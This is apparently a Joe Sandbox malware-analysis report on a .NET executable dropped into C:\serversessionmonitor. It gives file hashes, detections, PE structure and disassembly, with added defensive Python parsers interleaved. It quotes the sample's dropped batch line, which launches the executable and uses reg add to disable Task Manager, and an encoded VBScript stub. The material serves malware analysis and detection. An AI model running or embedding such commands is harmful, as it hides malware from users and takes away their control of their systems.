                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                              Process:C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1371
                              Entropy (8bit):5.366581410225247
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4j:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAM
                              MD5:289874BC03B0CB1B73F95A44E23B84A5
                              SHA1:F275F15181639F5CF9D17D52B662078C7982BBE1
                              SHA-256:0848F9D75F9CB57CB8505936C8D1806D4140BEFE2B169CD022ED97A6094B3F6F
                              SHA-512:227F67091FEF053586FA6DE1BA1FC2AD7631694401727C3A9F53ABBA6B46574EE72612827CBE91A39AD55EE5B5FE9286E7B54DD8262D6B35B0FE3ACBE24697B4
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
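The two 1371- and 1830-byte text drops above (previews beginning 1,"fusion","GAC",0) have the row layout of the .NET runtime's per-executable usage logs; the report does not name the files, so that identification is an assumption. What an analyst wants from them is the list of assemblies the dropped binary bound, and whether any dependency was loaded from somewhere other than the framework directories. The parser below is an added example, not part of the Joe Sandbox report. Its input is constructed: the rows visible in the preview with CRLF endings restored, plus one made-up type-3 row for a hypothetical Helper.dll so the outlier check has something to flag.

```python
r"""Parse CLR assembly usage-log rows of the kind shown in the preview above.

Added example, not part of the Joe Sandbox report. The layout matches the
.NET runtime usage logs (%LOCALAPPDATA%\Microsoft\CLR_v4.0\UsageLogs\<exe>.log);
that identification is an assumption, since the page does not name the file.
Each line is CSV: a record type followed by quoted fields. Type 3 rows carry
an assembly display name, the image path it was bound from, and a flag.
"""
from __future__ import annotations

import csv

# Constructed sample: the rows visible in the preview, CRLF restored, plus a
# made-up final row (Helper.dll under the malware's own directory) that is
# NOT on the page and exists only to exercise the outlier check.
SAMPLE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\b187b7f31cee3e87b56c8edca55324e0\\System.ni.dll",0\r\n'
    '3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Drawing\\567ff6b0de7f9dcd8111001e94ab7cf6\\System.Drawing.ni.dll",0\r\n'
    '3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Windows.Forms\\2a7fffeef3976b2a6f273db66b1f0107\\System.Windows.Forms.ni.dll",0\r\n'
    '3,"Helper, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null",'
    '"C:\\serversessionmonitor\\Helper.dll",0\r\n'
)

# Directories from which framework assemblies (GAC and NGen native images)
# are normally bound. Anything bound from elsewhere deserves a look.
FRAMEWORK_ROOTS = (
    "c:\\windows\\assembly\\",
    "c:\\windows\\microsoft.net\\",
)


def parse_usage_log(text: str) -> list[dict]:
    """Return one dict per type-3 (assembly binding) row, in file order."""
    rows = []
    # splitlines() drops the CRLF so the trailing flag field parses cleanly.
    for fields in csv.reader(text.splitlines()):
        if len(fields) < 4 or fields[0] != "3":
            continue
        display_name, path, flag = fields[1], fields[2], fields[3]
        rows.append({
            "name": display_name.split(",", 1)[0].strip(),  # simple name
            "display_name": display_name,
            "path": path,
            "flag": int(flag),
            "framework": path.lower().startswith(FRAMEWORK_ROOTS),
        })
    return rows


def loaded_assemblies(text: str) -> list[str]:
    """Sorted simple names of every assembly the process bound."""
    return sorted(r["name"] for r in parse_usage_log(text))


def non_framework_bindings(text: str) -> list[dict]:
    """Bindings whose image lives outside the framework directories."""
    return [r for r in parse_usage_log(text) if not r["framework"]]


if __name__ == "__main__":
    print("bound assemblies:", ", ".join(loaded_assemblies(SAMPLE_LOG)))
    for r in non_framework_bindings(SAMPLE_LOG):
        print("non-framework binding:", r["name"], "<-", r["path"])
```

On the rows actually visible in the preview every binding resolves under C:\Windows\assembly\NativeImages_v4.0.30319_64, so the only finding is the capability hint: System.Windows.Forms and System.Drawing were bound by a process that shows no window, which is consistent with the report's RAT classification but is not proof on its own.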
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (690), with no line terminators
                              Category:dropped
                              Size (bytes):690
                              Entropy (8bit):5.90512361354523
                              Encrypted:false
                              SSDEEP:12:4IoKJvnL9kbEkvGaoR157aCnR3kMo90/z54PGwi89I1Ecvr8qGf:TNBnL4Fwbnif9Sz5TwjfeHGf
                              MD5:20037CD7CD49D0CDC61A7C76B4EE5F4B
                              SHA1:EC861A5052A0E2D1A42AB41066C853C1B9DF9A7B
                              SHA-256:23F20EFC79379B6F9354A76CF79100479A70CC91F39BD5D94646D81C3197B7AA
                              SHA-512:68E0A589F24B57BD7EDB71C07686E833E74DB8C49313F514AECB59AA1A4E8A2797D23CD5F7AAC6605CF6389AE3A2C4AE57AD9B0A524CE8C6DCF7B22F1CB09A33
                              Malicious:false
                              Preview:H4VnNvqhnCYAMZeQNjhxlUZLuUNToqDZdRI93QrWQNl0aO441mYClzExeJ32hX3698h5RfX62KhYsivfZSbBRAynMVetXyy2Up1bq8mWPcKaSqE5YXdP61o8K3t6AnjDWoEDqTyapEwzzXVgQiV9Uj5cA2RxPqVl3GDnlBOEiCj1FzJwhNpbSksxslDyBBL9sK6sTs4PTQaS9EXLteQBA4TTYQ498aDh0kI42bdySaHBJaxoO1EguJ8y0nUDy4R3N2cZ5cSSBbtkwSJ7cPvGWgwqlUEOGaAXJOxQ8YtviwfSaYBieWkiJKhrFvxkYELlbVaie29Dg9hjAdQMTfuuzcO8rGKMkIXek41E8cElWgBJm7qmelR2Tbw9Hb1XrxdYlD8GmMO0bJXSaEWtZis90fLJH26glq4jDnij8k9SWbaKDdiDFH8IEdhG1z8uPsOvPyOxfwvzjanZEBGoT2besvejFbrJmPCnMp5PPvhSWJjo0HC0tUaWRuDdTorEFlMTX9NYG0YiVIIjL0t8Z1aRzqWcmb5kEdNu6QR04nu252BImdRd5spOL5eqnuwo5ye25Xm5i2EvGhW6pNzIJcoVx8jAvkMJ0F7HYJNO1W4Co3HnjhBa4ofdJIE6ylJ7q45BkOif9lRxhmq315bOivOMkd7PEQaPM7Vu8GCU8fbTWr6gcKF2K5
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):213
                              Entropy (8bit):5.78571368925169
                              Encrypted:false
                              SSDEEP:6:GcgwqK+NkLzWbHa/JUrFnBaORbM5nCcgjO0+ObphWs:GuMCzWLauhBaORbQCjy0+ObH1
                              MD5:AA5D2DCB34512F41ECEEF1887AD39F4A
                              SHA1:68A4B9F4B74966CCB17C078CA451D83B1647398A
                              SHA-256:FE304710B13AF9DED763440E7EE9DD150B044788F723675823BF41AF11707620
                              SHA-512:5BDC29D1518140A0A299D0117BD05EFEABAFF4553BADAF9AF916AD0FA104CAF56C9AD9115C90509366BCBB6B66DF567C451A60EC5218770A1CDF8F04F7A8DA70
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:#@~^vAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zd.D7+Dk+kdkKxhW.kOGMzW72(xAFX+p9S.$? 4COr~~!B~0mVdnsjwAAA==^#~@.
                              Process:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
• Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):151
                              Entropy (8bit):4.943167098000957
                              Encrypted:false
                              SSDEEP:3:I5GHqIcMtOWmdAZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:I0qi4CMTStuH1jhRiI36BY
                              MD5:6693AB77D25499B76854456E925BE0B2
                              SHA1:E686AE9DD5CBC8FAA019983B84D2CC83900A79AD
                              SHA-256:9582B41CC7E6B437271BF9B296C4DA97FD59AE90E98FB2E0F80CE7C4D8C73334
                              SHA-512:81F3AB6668F38DDBD4DD39D22A927F45DF85DED8EDB56B6EF86AC340B7C61A03C0812743CEC6C30E409F1E967662D0C91B13AB58E809AF147571300EDF271D4A
                              Malicious:false
                              Preview:"C:\serversessionmonitor\blockfont.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
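The dropped batch file above chains the dropped executable with a reg add that sets DisableTaskMgr under the HKCU Policies\System key. As an added example (not code from the report), the following Python splits a cmd.exe command line on chaining operators that sit outside quotes, extracts reg add writes to that policy key, and lists executables launched from a directory directly under the drive root that is not a standard Windows root. The watched value list (DisableTaskMgr, DisableRegistryTools, EnableLUA, PromptOnSecureDesktop, ConsentPromptBehaviorAdmin) and the standard-root list are this example's own assumptions; the sample command line is constructed from the dropped file content shown above.

```python
"""Triage helpers for cmd.exe one-liners such as the dropped .bat above.

Added illustrative code, not part of the sandbox report. The watched policy
values and the list of standard top-level directories are this example's
own assumptions.
"""
import re

# Values under ...\Policies\System whose modification from a user-land
# command line is worth an alert (assumption: a reasonable triage list).
WATCHED_VALUES = {
    "disabletaskmgr", "disableregistrytools", "enablelua",
    "promptonsecuredesktop", "consentpromptbehavioradmin",
}
POLICY_KEY = re.compile(r"\\policies\\system$", re.I)

# Top-level directories an executable is normally launched from (assumption).
STANDARD_ROOTS = {"windows", "program files", "program files (x86)", "programdata", "users"}


def split_cmd_chain(cmdline: str) -> list:
    """Split on cmd.exe chaining operators (&, &&, |, ||) that sit outside
    double quotes, so a quoted path containing '&' is not cut in half."""
    parts, buf, in_quote, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quote = not in_quote
            buf.append(ch)
        elif ch in "&|" and not in_quote:
            if "".join(buf).strip():
                parts.append("".join(buf).strip())
            buf = []
            if i + 1 < len(cmdline) and cmdline[i + 1] == ch:
                i += 1  # treat && and || as a single operator
        else:
            buf.append(ch)
        i += 1
    if "".join(buf).strip():
        parts.append("".join(buf).strip())
    return parts


def reg_add_findings(command: str) -> list:
    """Return 'key\\value = data' for reg add calls that touch a watched value."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]
    if len(toks) < 3 or toks[1].lower() != "add":
        return []
    if toks[0].lower().rsplit("\\", 1)[-1] not in ("reg", "reg.exe"):
        return []
    key = toks[2].rstrip("\\")
    opts = {}
    for i in range(3, len(toks) - 1):
        if toks[i].lower() in ("/v", "/t", "/d"):
            opts[toks[i].lower()] = toks[i + 1]
    if POLICY_KEY.search(key) and opts.get("/v", "").lower() in WATCHED_VALUES:
        return [f"{key}\\{opts['/v']} = {opts.get('/d', '(default)')}"]
    return []


def odd_root_paths(parts: list) -> list:
    """Executables whose first path component is not a standard root."""
    found = []
    for p in parts:
        m = re.match(r'^"?([A-Za-z]:\\[^"]*?\.exe)"?', p)
        if m:
            path = m.group(1)
            top = path.split("\\")[1].lower()
            if top not in STANDARD_ROOTS:
                found.append(path)
    return found


def analyze(cmdline: str) -> dict:
    """Split the chain and collect both kinds of finding."""
    parts = split_cmd_chain(cmdline)
    policy = [f for p in parts for f in reg_add_findings(p)]
    return {"parts": parts, "odd_paths": odd_root_paths(parts), "policy_writes": policy}


# Constructed from the dropped file's content shown in the report.
SAMPLE_BAT = (r'"C:\serversessionmonitor\blockfont.exe" & reg add '
              r'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System '
              r'/v DisableTaskMgr /t REG_DWORD /d 1 /f')

if __name__ == "__main__":
    print(analyze(SAMPLE_BAT))
```

Feed it the CommandLine field of process-creation telemetry; the quote-aware split matters because a path such as "C:\a&b\x.exe" would otherwise be cut at the ampersand and the reg add half lost.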
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.978724276038117
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.97%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:5P9EdUgv5r.exe
                              File size:1'577'715 bytes
                              MD5:1f70e167b93d471af9daf333145db4cd
                              SHA1:b7c1afc111a98055b28c94f62599ff33f41ced24
                              SHA256:9fbc9f10ad8bc902a7a847d76b9792ac9f995555e856824f96fd04b7290b5aed
                              SHA512:652ab9c08079711d2d3aa344e78ee3344113e56c62986555215d5669627a773055cc43f851af96ef98940709eecbb355dc12ab24061b3e7452d48580d95c3dad
                              SSDEEP:24576:U2G/nvxW3Ww0tdAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4c:UbA30O2vGd1onZGCP6Oz
                              TLSH:74758C027F548A12F1191637D2EF850447B0EC516AAAE71B7EBE376E95123937C0CACB
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                              Icon Hash:1515d4d4442f2d2d
                              Entrypoint:0x41ec40
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                              Instruction
                              call 00007F43207EA049h
                              jmp 00007F43207E9A5Dh
                              cmp ecx, dword ptr [0043E668h]
                              jne 00007F43207E9BD5h
                              ret
                              jmp 00007F43207EA1CEh
                              int3
                              int3
                              int3
                              int3
                              int3
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007F43207DC967h
                              mov dword ptr [esi], 00435580h
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 00435588h
                              mov dword ptr [ecx], 00435580h
                              ret
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              lea eax, dword ptr [ecx+04h]
                              mov dword ptr [ecx], 00435568h
                              push eax
                              call 00007F43207ECD6Dh
                              pop ecx
                              ret
                              push ebp
                              mov ebp, esp
                              sub esp, 0Ch
                              lea ecx, dword ptr [ebp-0Ch]
                              call 00007F43207DC8FEh
                              push 0043B704h
                              lea eax, dword ptr [ebp-0Ch]
                              push eax
                              call 00007F43207EC482h
                              int3
                              push ebp
                              mov ebp, esp
                              sub esp, 0Ch
                              lea ecx, dword ptr [ebp-0Ch]
                              call 00007F43207E9B74h
                              push 0043B91Ch
                              lea eax, dword ptr [ebp-0Ch]
                              push eax
                              call 00007F43207EC465h
                              int3
                              jmp 00007F43207EE4B3h
                              jmp dword ptr [00433260h]
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push 00421EB0h
                              push dword ptr fs:[00000000h]
                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [C++] VS2015 UPD3.1 build 24215
                              • [EXP] VS2015 UPD3.1 build 24215
                              • [RES] VS2015 UPD3 build 24213
                              • [LNK] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x63000 | 0xdfd0 | 0xe000 | f6c0f34fae6331b50a7ad2efc4bfefdb | False | 0.6370326450892857 | data | 6.6367506404157535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
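The DLL characteristics, section table and per-section entropy above are read straight from the PE headers. The following added example (illustrative code, not part of the Joe Sandbox report and not the sample's own code) walks those structures with the Python standard library: it decodes the DllCharacteristics mitigation flags, parses the section table, computes Shannon entropy over each section's raw bytes the way the report's Entropy column does, and flags writable-and-executable or high-entropy code sections. It constructs its own two-section PE32 image as test input; the 7.2 entropy cut-off is an arbitrary triage threshold, not a value from the report.

```python
"""Minimal PE header walker: section table, per-section Shannon entropy and
DllCharacteristics mitigation flags.

Added illustrative code; not part of the sandbox report or of the analysed
sample. It parses only the fields needed here (COFF header, the
DllCharacteristics word of the optional header, and the section table).
"""
import math
import struct

# Section characteristics (IMAGE_SCN_*) from winnt.h
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# DllCharacteristics flags (IMAGE_DLLCHARACTERISTICS_*) shown in the report
DLL_FLAGS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Return machine, PE32/PE32+, DllCharacteristics names and section list."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    # DllCharacteristics is at offset 70 of both the PE32 and PE32+ optional header
    dllchars = struct.unpack_from("<H", image, opt + 70)[0]
    sections = []
    sec = opt + opt_size
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _r, _l, _nr, _nl, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, sec + 40 * i)
        raw = image[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": round(shannon_entropy(raw), 3),
            "characteristics": chars,
            "wx": bool(chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE),
        })
    return {"machine": machine, "pe32plus": magic == 0x20B,
            "dllchars": [n for f, n in sorted(DLL_FLAGS.items()) if dllchars & f],
            "sections": sections}


def flag_sections(parsed: dict, entropy_threshold: float = 7.2) -> list:
    """Sections a triager should look at: W+X, or executable with packed-looking entropy."""
    return [s["name"] for s in parsed["sections"]
            if s["wx"] or (s["characteristics"] & IMAGE_SCN_MEM_EXECUTE
                           and s["entropy"] >= entropy_threshold)]


def build_sample_image() -> bytes:
    """Constructed PE32 test image (not the analysed sample): two sections,
    a maximally random .text and an all-zero .data, flags 0xC140 as in the report."""
    text = bytes(range(256)) * 2          # every byte value twice -> entropy 8.0
    data = b"\0" * 512                    # constant -> entropy 0.0
    e_lfanew, opt_size, raw_text, raw_data = 0x40, 224, 0x200, 0x400
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)       # ImageBase
    struct.pack_into("<H", opt, 70, 0xC140)         # DllCharacteristics
    sec_text = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), raw_text, 0, 0, 0, 0,
                           IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    sec_data = struct.pack("<8sIIIIIIHHI", b".data", len(data), 0x2000, len(data), raw_data, 0, 0, 0, 0,
                           IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    image = bytearray(dos + b"PE\0\0" + coff + bytes(opt) + sec_text + sec_data)
    image.extend(b"\0" * (raw_text - len(image)))
    image.extend(text)
    image.extend(b"\0" * (raw_data - len(image)))
    image.extend(data)
    return bytes(image)


if __name__ == "__main__":
    parsed = parse_pe(build_sample_image())
    print(parsed["dllchars"], flag_sections(parsed))
```

On a real file, pass `open(path, "rb").read()` to `parse_pe`; a high-entropy .text or a W+X section is the usual first hint of a packed or self-modifying payload, and a missing NX_COMPAT or DYNAMIC_BASE flag tells you which memory-corruption mitigations the loader will not apply.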
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x65748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
